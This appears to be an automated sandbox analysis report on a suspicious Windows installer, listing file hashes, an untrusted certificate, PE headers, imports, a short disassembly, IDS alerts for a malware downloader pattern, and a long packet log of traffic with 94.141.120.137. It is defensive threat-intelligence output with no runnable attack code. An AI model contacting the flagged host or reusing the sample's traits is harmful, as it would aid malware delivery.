SHA512: 9fe90ed6095223ee98eb1372708cf77c7b2cd2482899bded7bd9f99f823afdeb89370309e0a087000e4345dab4b10a428ffd1d0afa486b7091f8fc3f30d0cc70
SSDEEP: 12288:1XFAO9mjNkvzScpPdK/Pr595FUCCVjscJ4nX0q2mY9+QQh3HEc:1XFNQyvzSYlCNIV+nX0q2I3HEc
TLSH: 56E423A573B5D18BD8E2067D44739EB11ED5FE2103680307E3503B3FEE619A2D50AB6A
Icon Hash: 1f2339d96f221e03
Entrypoint: 0x4034fc
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f4639a0b3116c2cfc71144b88a929cfd
Signature Valid: false
Signature Issuer: CN=Cumar, O=Cumar, L=Allakaket, C=US
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• 16/07/2024 07:03:02, 16/07/2027 07:03:02
Subject Chain:
• CN=Cumar, O=Cumar, L=Allakaket, C=US
Version: 3
Thumbprint MD5: ECEE05B918780F37502B83206CA78B0E
Thumbprint SHA-1: 6DE1F22E2FB7CCB64DFC7DE90B6003DB1640EEEE
Thumbprint SHA-256: 5D59B5AA6C57A532C45CB4177EDB9F141BA4B64FBF08E79B347B5CD3786DDD93
Serial: 12CCDCD1467EB0188E954DAD81F229922F8C4669
Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F04306C52DAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F04306C52A8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4e000 | 0x6e38 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa7588 | 0x11c8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6556 | 0x6600 | dd25e171f2e0fe45f2800cc9e162537d | False | 0.6652113970588235 | data | 6.456753840355455 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1fb38 | 0x600 | 2bc02714ee74ba781d92e94eeaccb080 | False | 0.501953125 | data | 4.040639308682379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x24000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4e000 | 0x6e38 | 0x7000 | 47ffad5a0fe61c18388c530528acf3b4 | False | 0.48440987723214285 | data | 5.489502239559345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4e388 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.39066390041493776
RT_ICON | 0x50930 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.6287523452157598
RT_ICON | 0x519d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5791577825159915
RT_ICON | 0x52880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.680956678700361
RT_ICON | 0x53128 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.3128048780487805
RT_ICON | 0x53790 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.5375722543352601
RT_ICON | 0x53cf8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7269503546099291
RT_ICON | 0x54160 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.41263440860215056
RT_ICON | 0x54448 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.625
RT_DIALOG | 0x54570 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x54670 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x54790 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x54858 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x548b8 | 0x84 | data | English | United States | 0.6136363636363636
RT_VERSION | 0x54940 | 0x1b8 | COM executable for DOS | English | United States | 0.5727272727272728
RT_MANIFEST | 0x54af8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-12T07:35:17.147775+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.5 | 49704 | TCP
2024-11-12T07:35:47.375106+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49836 | 94.141.120.137 | 80 | TCP
2024-11-12T07:35:56.451141+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.5 | 49882 | TCP
                                                            Nov 12, 2024 07:35:47.653233051 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653256893 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653256893 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.653268099 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653275013 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.653311968 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789269924 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789290905 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789302111 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789313078 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789325953 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789328098 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789338112 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789356947 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789402962 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789582968 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789596081 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789607048 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789623976 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789625883 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789655924 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789688110 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790100098 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790112019 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790122032 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790150881 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790174007 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790184021 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790186882 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790199041 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790210009 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790221930 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790227890 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790257931 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.791019917 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.791035891 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.791047096 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.791074991 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.791089058 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908085108 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908113003 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908124924 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908145905 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908164978 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908165932 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908179998 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908217907 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908230066 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908241034 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908241034 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908258915 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908293962 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908302069 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908864021 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908883095 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908907890 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908920050 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927191973 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927207947 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927222967 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927248001 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927264929 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927333117 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927350044 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927361965 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927372932 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927372932 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927386999 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927401066 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927428961 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927865028 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927877903 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927889109 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927906990 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927937984 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.928106070 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.928142071 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.928157091 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.928186893 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027014971 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027031898 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027050018 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027062893 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027075052 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027097940 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027153015 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027321100 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027333975 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027344942 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027367115 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027395964 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027602911 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027615070 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027625084 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027653933 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027667999 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046468019 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046493053 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046577930 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046637058 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046648026 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046648979 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046648979 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046648979 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046689987 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046704054 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046804905 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046850920 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046861887 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046874046 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046874046 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046889067 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046911955 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047226906 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047271013 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047297001 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047334909 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047359943 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047405005 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047418118 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047430038 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047440052 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047463894 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047491074 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146080971 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146141052 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146152973 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146163940 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146229029 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146241903 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146253109 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146265030 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146354914 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146354914 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146599054 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146642923 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146667957 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146711111 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.165724039 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165765047 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165873051 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165908098 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165936947 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165951014 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.165952921 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165968895 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165983915 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165992022 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.165998936 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166011095 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166017056 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166040897 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166070938 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166476965 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166490078 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166501045 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166531086 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166549921 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166706085 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166774035 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166785955 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166830063 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265352964 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265381098 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265402079 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265418053 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265430927 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265446901 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265465975 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265476942 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265501022 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265527964 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265538931 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265542984 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265568972 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265600920 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265600920 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265614986 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299654007 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299668074 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299679041 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299691916 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299706936 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299725056 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299725056 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299738884 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299751997 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299768925 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299781084 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299782038 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299799919 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299801111 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299813986 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299818039 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299825907 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299835920 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299838066 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299848080 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299866915 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299866915 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299891949 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299922943 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.384287119 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384305954 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384314060 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384340048 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384351969 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384362936 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384373903 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384397030 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.384454966 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.384665012 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384675980 CET804983694.141.120.137192.168.2.5
